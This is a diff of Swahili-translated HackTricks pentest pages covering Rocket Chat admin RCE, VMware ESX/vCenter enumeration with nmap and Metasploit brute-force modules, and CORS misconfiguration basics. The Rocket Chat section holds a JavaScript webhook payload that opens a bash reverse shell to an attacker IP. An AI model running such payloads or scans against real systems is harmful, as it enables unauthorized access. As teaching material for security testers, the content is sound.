||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
|
|
|
@ -2,18 +2,23 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## RCE
|
||||
|
||||
Ikiwa wewe ni msimamizi ndani ya Rocket Chat unaweza kupata RCE.
|
||||
|
@ -23,13 +28,13 @@ Ikiwa wewe ni msimamizi ndani ya Rocket Chat unaweza kupata RCE.
|
|||
|
||||
<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Kulingana na [nyaraka](https://docs.rocket.chat/guides/administration/admin-panel/integrations) zote hutumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kusindika data. Kwa hivyo tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kama:
|
||||
* Kulingana na [nyaraka](https://docs.rocket.chat/guides/administration/admin-panel/integrations) zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kusindika data. Kwa hivyo tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kama:
|
||||
```javascript
|
||||
const require = console.log.constructor('return process.mainModule.require')();
|
||||
const { exec } = require('child_process');
|
||||
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
||||
```
|
||||
* Configure WebHook (channel na chapisha kama jina la mtumiaji lazima liwepo):
|
||||
* Configure WebHook (channel na chapisha kama jina la mtumiaji lazima ziwepo):
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (902).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -44,6 +49,11 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
|||
|
||||
* Iiite kwa kutumia curl na unapaswa kupokea rev shell
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -54,6 +64,6 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,50 +1,48 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
# Uchunguzi
|
||||
```text
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
# Uchambuzi
|
||||
```bash
|
||||
nmap -sV --script "http-vmware-path-vuln or vmware-version" -p <PORT> <IP>
|
||||
msf> use auxiliary/scanner/vmware/esx_fingerprint
|
||||
msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
|
||||
```
|
||||
# Kuvunja nguvu
|
||||
|
||||
Kuvunja nguvu ni mbinu ya kujaribu kuingia kwenye mfumo kwa kujaribu idadi kubwa ya maneno ya siri hadi kupata moja sahihi. Mbinu hii inaweza kutumika kuvunja nguvu ya nywila za watumiaji au hata kuvunja nguvu ya nywila ya kuingia kwenye mfumo wa VMware ESX/vCenter.
|
||||
|
||||
Kuna njia kadhaa za kutekeleza kuvunja nguvu, kama vile:
|
||||
|
||||
- **Dictionary Attack**: Kuvunja nguvu kwa kutumia orodha ya maneno ya siri maarufu au maneno yaliyotumiwa mara kwa mara.
|
||||
- **Brute Force Attack**: Kuvunja nguvu kwa kujaribu kila kombinasi inayowezekana ya herufi na nambari hadi kupata nywila sahihi.
|
||||
- **Hybrid Attack**: Kuvunja nguvu kwa kuchanganya mbinu za kuvunja nguvu za kawaida na kuvunja nguvu kwa kutumia orodha ya maneno ya siri.
|
||||
|
||||
Ni muhimu kutambua kuwa kuvunja nguvu ni shughuli haramu na inaweza kusababisha madhara makubwa. Kwa hivyo, ni muhimu kufuata sheria na kanuni zinazohusiana na matumizi ya mbinu hii.
|
||||
```text
|
||||
```bash
|
||||
msf> auxiliary/scanner/vmware/vmware_http_login
|
||||
```
|
||||
Ikiwa utapata vitambulisho halali, unaweza kutumia moduli zaidi za skana za metasploit kupata habari.
|
||||
Ikiwa unapata anwani halali za kuingia, unaweza kutumia moduli zaidi za skana za metasploit kupata habari.
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# CORS - Makosa ya Usanidi na Kupitisha
|
||||
# CORS - Makosa ya Usanidi & Kupitisha
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -6,7 +6,7 @@
|
|||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -14,15 +14,19 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
## Ni nini CORS?
|
||||
|
||||
Mkataba wa Kugawana Rasilmali kati ya Mito (CORS) **inaruhusu seva kuamua ni nani anaweza kupata mali zao** na **njia za maombi za HTTP zipi zinaruhusiwa** kutoka vyanzo vya nje.
|
||||
Mkataba wa **Kushiriki Rasilmali kati ya Mipaka (CORS)** **inaruhusu seva kufafanua ni nani anaweza kupata mali zao** na **njia za ombi za HTTP zipi zinaruhusiwa** kutoka vyanzo vya nje.
|
||||
|
||||
Sera ya **asili sawa** inahitaji kwamba **seva inayotaka** rasilimali na seva inayohifadhi **rasilimali** washiriki itifaki sawa (k.m., `http://`), jina la kikoa (k.m., `internal-web.com`), na **bandari** (k.m., 80). Chini ya sera hii, kurasa za wavuti kutoka kikoa na bandari sawa tu ndio zinaruhusiwa kupata rasilimali.
|
||||
Sera ya **asili sawa** inahitaji kwamba **seva inayotaka** rasilimali na seva inayohifadhi **rasilimali** washiriki itifaki sawa (k.m., `http://`), jina la kikoa sawa (k.m., `internal-web.com`), na **bandari** (k.m., 80). Chini ya sera hii, kurasa za wavuti kutoka kwa kikoa na bandari sawa tu ndio zinaruhusiwa kupata rasilimali.
|
||||
|
||||
Matumizi ya sera ya asili sawa katika muktadha wa `http://normal-website.com/example/example.html` inaonyeshwa kama ifuatavyo:
|
||||
|
||||
| URL iliyopatikana | Kupatikana kuruhusiwa? |
|
||||
| URL iliyopatikana | Upatikanaji kuruhusiwa? |
|
||||
| ----------------------------------------- | --------------------------------------- |
|
||||
| `http://normal-website.com/example/` | Ndiyo: Itifaki, kikoa, na bandari sawa |
|
||||
| `http://normal-website.com/example2/` | Ndiyo: Itifaki, kikoa, na bandari sawa |
|
||||
|
@ -31,19 +35,19 @@ Matumizi ya sera ya asili sawa katika muktadha wa `http://normal-website.com/exa
|
|||
| `http://www.normal-website.com/example/` | Hapana: Kikoa tofauti |
|
||||
| `http://normal-website.com:8080/example/` | Hapana: Bandari tofauti\* |
|
||||
|
||||
\*Internet Explorer haizingatii nambari ya bandari katika kutekeleza sera ya asili sawa, hivyo kuruhusu ufikiaji huu.
|
||||
\*Internet Explorer haizingatii nambari ya bandari katika kutekeleza sera ya asili sawa, hivyo kuruhusu upatikanaji huu.
|
||||
|
||||
### Kichwa cha `Access-Control-Allow-Origin`
|
||||
|
||||
Kichwa hiki kinaweza kuruhusu **mizizi mingi**, thamani ya **`null`**, au alama ya mwitikio **`*`**. Walakini, **kivinjari hakisaidii mizizi mingi**, na matumizi ya alama ya mwitikio `*` yanategemea **vizuizi**. (Alama ya mwitikio inapaswa kutumika peke yake, na matumizi yake pamoja na `Access-Control-Allow-Credentials: true` hayaruhusiwi.)
|
||||
Kichwa hiki kinaweza kuruhusu **mizizi mingi**, thamani ya **`null`**, au alama ya mwitikio wa **`*`**. Walakini, **kivinjari chochote hakiruhusu mizizi mingi**, na matumizi ya alama ya mwitikio `*` yanategemea **vizuizi**. (Alama ya mwitikio inapaswa kutumika peke yake, na matumizi yake pamoja na `Access-Control-Allow-Credentials: true` hayaruhusiwi.)
|
||||
|
||||
Kichwa hiki **hutolewa na seva** kujibu ombi la rasilimali kati ya mito lililoanzishwa na wavuti, na kivinjari kiotomatiki huongeza kichwa cha `Origin`.
|
||||
Kichwa hiki **hutolewa na seva** kujibu ombi la rasilimali kati ya mipaka lililoanzishwa na wavuti, na kivinjari kiotomatiki huongeza kichwa cha `Origin`.
|
||||
|
||||
### Kichwa cha `Access-Control-Allow-Credentials`
|
||||
|
||||
Kwa **chaguo-msingi**, maombi ya kati-mito hufanywa bila sifa kama vidakuzi au kichwa cha Uthibitishaji. Walakini, seva ya kati-mito inaweza kuruhusu kusoma kwa jibu wakati sifa zinatumwa kwa kuweka kichwa cha `Access-Control-Allow-Credentials` kuwa **`kweli`**.
|
||||
Kwa **chaguo-msingi**, maombi ya mipaka ya mipaka hufanywa bila sifa kama vidakuzi au kichwa cha Uthibitishaji. Walakini, seva ya mipaka ya mipaka inaweza kuruhusu kusoma kwa jibu wakati sifa zinatumwa kwa kuweka kichwa cha `Access-Control-Allow-Credentials` kuwa **`kweli`**.
|
||||
|
||||
Ikisetwa kuwa `kweli`, kivinjari kitatuma sifa (vidakuzi, vichwa vya uthibitishaji, au vyeti vya mteja vya TLS).
|
||||
Ikiwa imewekwa kuwa `kweli`, kivinjari kitatuma sifa (vidakuzi, vichwa vya uthibitishaji, au vyeti vya mteja vya TLS).
|
||||
```javascript
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
|
@ -72,15 +76,15 @@ xhr.send('<person><name>Arun</name></person>');
|
|||
```
|
||||
### Ombi la CSRF la kabla ya safari
|
||||
|
||||
### Kuelewa Maombi ya Kabla ya Safari katika Mawasiliano ya Mikoa Tofauti
|
||||
### Kuelewa Maombi ya Kabla ya Safari katika Mawasiliano ya Kuvuka-Domeini
|
||||
|
||||
Unapoanzisha ombi la msalaba-mikoa chini ya hali maalum, kama kutumia **njia ya HTTP isiyo ya kawaida** (chochote kisichokuwa HEAD, GET, POST), kuingiza **vichwa vipya**, au kutumia thamani maalum ya **kichwa cha Aina ya Yaliyomo**, inaweza kuhitajika ombi la kabla ya safari. Ombi hili la awali, likitumia njia ya **`OPTIONS`**, hutumika kumjulisha seva nia za ombi la msalaba-mwanzo linalokuja, ikiwa ni pamoja na njia za HTTP na vichwa itakavyotumia.
|
||||
Unapoanzisha ombi la kuvuka-domeini chini ya hali maalum, kama kutumia **njia ya HTTP isiyo ya kawaida** (kitu kingine chochote isipokuwa HEAD, GET, POST), kuingiza **vichwa vipya**, au kutumia thamani maalum ya **kichwa cha Aina ya Yaliyomo**, ombi la kabla ya safari linaweza kuhitajika. Ombi hili la awali, likitumia njia ya **`OPTIONS`**, hutumika kuijulisha seva nia za ombi la kuvuka asili linalokuja, ikiwa ni pamoja na njia za HTTP na vichwa itakavyotumia.
|
||||
|
||||
Itifaki ya **Kugawana Rasilmali kwa Mawasiliano ya Mipaka (CORS)** inahitaji ukaguzi huu wa kabla ya safari ili kubaini uwezekano wa operesheni ya msalaba-mwanzo inayotakiwa kwa kuthibitisha njia zilizoruhusiwa, vichwa, na uaminifu wa asili. Kwa uelewa wa kina wa hali zipi zinazopuuza haja ya ombi la kabla ya safari, tazama mwongozo kamili uliotolewa na [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests).
|
||||
Itifaki ya **Kugawana Rasilmali kwa Kuvuka-Mizizi (CORS)** inahitaji ukaguzi huu wa kabla ya safari ili kubaini uwezekano wa operesheni ya kuvuka asili iliyotakiwa kwa kuthibitisha njia zilizoruhusiwa, vichwa, na uaminifu wa asili. Kwa uelewa wa kina wa hali zipi zinazopuuza haja ya ombi la kabla ya safari, tazama mwongozo kamili uliotolewa na [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests).
|
||||
|
||||
Ni muhimu kuelewa kwamba **ukosefu wa ombi la kabla ya safari haimaanishi kwamba jibu halihitaji kubeba vichwa vya idhini**. Bila vichwa hivi, kivinjari kinashindwa kusindika jibu kutoka kwa ombi la msalaba-mwanzo.
|
||||
Ni muhimu kuelewa kwamba **ukosefu wa ombi la kabla ya safari hauondoi hitaji la majibu kubeba vichwa vya idhini**. Bila vichwa hivi, kivinjari kimelemazwa katika uwezo wake wa kusindika jibu kutoka kwa ombi la kuvuka asili.
|
||||
|
||||
Chukua mfano ufuatao wa ombi la kabla ya safari linalolenga kutumia njia ya `PUT` pamoja na kichwa cha desturi kilichoitwa `Kichwa-Maombi-Maalum`:
|
||||
Chukua mfano ufuatao wa ombi la kabla ya safari lililolenga kutumia njia ya `PUT` pamoja na kichwa cha desturi kilichoitwa `Kichwa-Maombi-Maalum`:
|
||||
```
|
||||
OPTIONS /info HTTP/1.1
|
||||
Host: example2.com
|
||||
|
@ -100,19 +104,19 @@ Access-Control-Allow-Credentials: true
|
|||
Access-Control-Max-Age: 240
|
||||
```
|
||||
* **`Access-Control-Allow-Headers`**: Kichwa hiki hufafanua ni vichwa vipi vinaweza kutumika wakati wa ombi halisi. Kinasanidiwa na seva kuonyesha vichwa vilivyoidhinishwa katika maombi kutoka kwa mteja.
|
||||
* **`Access-Control-Expose-Headers`**: Kupitia kichwa hiki, seva inaarifu mteja ni vichwa vipi vinaweza kuwekwa wazi kama sehemu ya majibu isipokuwa vichwa vya majibu ya kawaida.
|
||||
* **`Access-Control-Max-Age`**: Kichwa hiki kinaonyesha muda gani matokeo ya ombi la awali yanaweza kuhifadhiwa. Seva inaweka muda wa kikomo, kwa sekunde, ambapo habari iliyorudishwa na ombi la awali inaweza kutumika tena.
|
||||
* **`Access-Control-Request-Headers`**: Kutumika katika maombi ya awali, kichwa hiki kinasanidiwa na mteja kuarifu seva ni vichwa vya HTTP ambavyo mteja anataka kutumia katika ombi halisi.
|
||||
* **`Access-Control-Expose-Headers`**: Kupitia kichwa hiki, seva inaarifu mteja ni vichwa vipi vinaweza kuonyeshwa kama sehemu ya jibu mbali na vichwa vya jibu rahisi.
|
||||
* **`Access-Control-Max-Age`**: Kichwa hiki kinaonyesha muda gani matokeo ya ombi la awali yanaweza kuhifadhiwa. Seva inaweka muda wa maksimumu, kwa sekunde, ambao habari inayorudi kutoka kwa ombi la awali inaweza kutumika tena.
|
||||
* **`Access-Control-Request-Headers`**: Kutumika katika maombi ya awali, kichwa hiki kinasanidiwa na mteja kuarifu seva ni vichwa vya HTTP vipi mteja anataka kutumia katika ombi halisi.
|
||||
* **`Access-Control-Request-Method`**: Kichwa hiki, pia kutumika katika maombi ya awali, kinasanidiwa na mteja kuonyesha ni njia gani ya HTTP itatumika katika ombi halisi.
|
||||
* **`Origin`**: Kichwa hiki kinasanidiwa moja kwa moja na kivinjari na kuonyesha asili ya ombi la msingi wa msalaba-mzizi. Hutumiwa na seva kutathmini ikiwa ombi linalokuja linapaswa kuruhusiwa au kukataliwa kulingana na sera ya CORS.
|
||||
* **`Origin`**: Kichwa hiki kinasanidiwa moja kwa moja na kivinjari na kinaonyesha asili ya ombi la msingi. Hutumiwa na seva kutathmini ikiwa ombi linaloingia linapaswa kuruhusiwa au kukataliwa kulingana na sera ya CORS.
|
||||
|
||||
Tafadhali kumbuka kwamba kawaida (kulingana na aina ya yaliyomo na vichwa vilivyosanidiwa) katika ombi la **GET/POST hakuna ombi la awali linalotumwa** (ombi linatumwa **moja kwa moja**), lakini ikiwa unataka kupata **vichwa/mwili wa majibu**, lazima iwe na kichwa cha _Access-Control-Allow-Origin_ kuruhusu hilo.\
|
||||
Tafadhali kumbuka kwamba kawaida (kulingana na aina ya yaliyomo na vichwa vilivyosanidiwa) katika ombi la **GET/POST hakuna ombi la awali linalotumwa** (ombi linatumiwa **moja kwa moja**), lakini ikiwa unataka kupata **vichwa/mwili wa jibu**, lazima liwe na kichwa cha _Access-Control-Allow-Origin_ kuruhusu hilo.\
|
||||
**Hivyo basi, CORS haitoi ulinzi dhidi ya CSRF (ingawa inaweza kuwa na manufaa).**
|
||||
|
||||
### **Ombi la Awali la Mtandao wa Ndani**
|
||||
|
||||
1. **`Access-Control-Request-Local-Network`**: Kichwa hiki kinaingizwa katika ombi la mteja kumaanisha kuwa uchunguzi unalenga rasilimali ya mtandao wa ndani. Hufanya kama alama kuarifu seva kwamba ombi linatoka ndani ya mtandao wa ndani.
|
||||
2. **`Access-Control-Allow-Local-Network`**: Kujibu, seva hutumia kichwa hiki kuwasiliana kwamba rasilimali iliyoombwa inaruhusiwa kushirikishwa na vyama nje ya mtandao wa ndani. Hufanya kama taa ya kijani kwa kushirikisha rasilimali kati ya mipaka tofauti ya mtandao, ikidumisha ufikiaji uliodhibitiwa wakati wa kudumisha itifaki za usalama.
|
||||
1. **`Access-Control-Request-Local-Network`**: Kichwa hiki kinaingizwa katika ombi la mteja kumaanisha kuwa uchunguzi unalenga rasilimali ya mtandao wa ndani. Hutumika kama ishara kwa seva kuarifu kuwa ombi linatoka ndani ya mtandao wa ndani.
|
||||
2. **`Access-Control-Allow-Local-Network`**: Kama jibu, seva hutumia kichwa hiki kuwasiliana kwamba rasilimali iliyoombwa inaruhusiwa kushirikishwa na vyama nje ya mtandao wa ndani. Hufanya kama taa ya kijani kwa kushirikisha rasilimali kati ya mipaka tofauti ya mtandao, ikidumisha ufikiaji uliodhibitiwa wakati wa kudumisha itifaki za usalama.
|
||||
|
||||
**Jibu halali linaloruhusu ombi la mtandao wa ndani** lazima pia liwe na kichwa `Access-Controls-Allow-Local_network: true`:
|
||||
```
|
||||
|
@ -126,18 +130,18 @@ Content-Length: 0
|
|||
...
|
||||
```
|
||||
{% hint style="warning" %}
|
||||
Tafadhali kumbuka kuwa IP ya linux **0.0.0.0** inafanya kazi kwa **kupita** mahitaji haya ya kufikia localhost kwa sababu anwani hiyo ya IP haichukuliwi "ya ndani".
|
||||
Tafadhali kumbuka kuwa IP ya linux **0.0.0.0** inafanya kazi kwa **kupita** mahitaji haya ili kupata ufikiaji wa localhost kwa sababu anwani hii ya IP haichukuliwi kuwa "ya ndani".
|
||||
|
||||
Pia ni pamoja na kufanya **kupita mahitaji ya Mtandao wa Ndani** ikiwa unatumia **anwani ya IP ya umma ya mwisho** (kama vile anwani ya IP ya router). Kwa sababu katika matukio kadhaa, hata kama **anwani ya IP ya umma** inafikiwa, ikiwa ni **kutoka kwenye mtandao wa ndani**, ufikiaji utapewa.
|
||||
Pia ni pamoja na **kupita mahitaji ya Mtandao wa Ndani** ikiwa unatumia **anwani ya IP ya umma ya mwisho** (kama vile anwani ya IP ya router). Kwa sababu katika hali kadhaa, hata kama **anwani ya IP ya umma** inafikiwa, ikiwa ni **kutoka kwenye mtandao wa ndani**, ufikiaji utaruhusiwa.
|
||||
{% endhint %}
|
||||
|
||||
## Mipangilio Inayoweza Kudukuliwa
|
||||
|
||||
Imeonekana kuwa kuweka `Access-Control-Allow-Credentials` kuwa **`kweli`** ni sharti la msingi kwa **mashambulizi halisi** mengi. Mipangilio hii inaruhusu kivinjari kutuma vitambulisho na kusoma majibu, ikiboresha ufanisi wa shambulio. Bila hii, faida ya kufanya kivinjari litoe ombi badala ya kufanya mwenyewe hupungua, kwani kutumia vidakuzi vya mtumiaji kunakuwa sio jambo la kufanyika.
|
||||
Imeonekana kuwa kuweka `Access-Control-Allow-Credentials` kuwa **`kweli`** ni sharti la msingi kwa **mashambulizi halisi** mengi. Mipangilio hii inaruhusu kivinjari kutuma vitambulisho na kusoma majibu, ikiboresha ufanisi wa shambulizi. Bila hii, faida ya kufanya kivinjari litoe ombi badala ya kufanya mwenyewe hupungua, kwani kutumia vidakuzi vya mtumiaji kunakuwa sio jambo la kufanyika.
|
||||
|
||||
### Ubunifu: Kutumia Mahali pa Mtandao kama Uthibitisho
|
||||
|
||||
Kuna ubunifu ambapo eneo la mtandao la muathiriwa hufanya kama aina ya uthibitisho. Hii inaruhusu kivinjari cha muathiriwa kutumika kama proksi, ikizunguka uthibitisho wa msingi wa IP kufikia programu za mtandao wa ndani. Mbinu hii inashirikisha fanano katika athari na DNS rebinding lakini ni rahisi zaidi kudukua.
|
||||
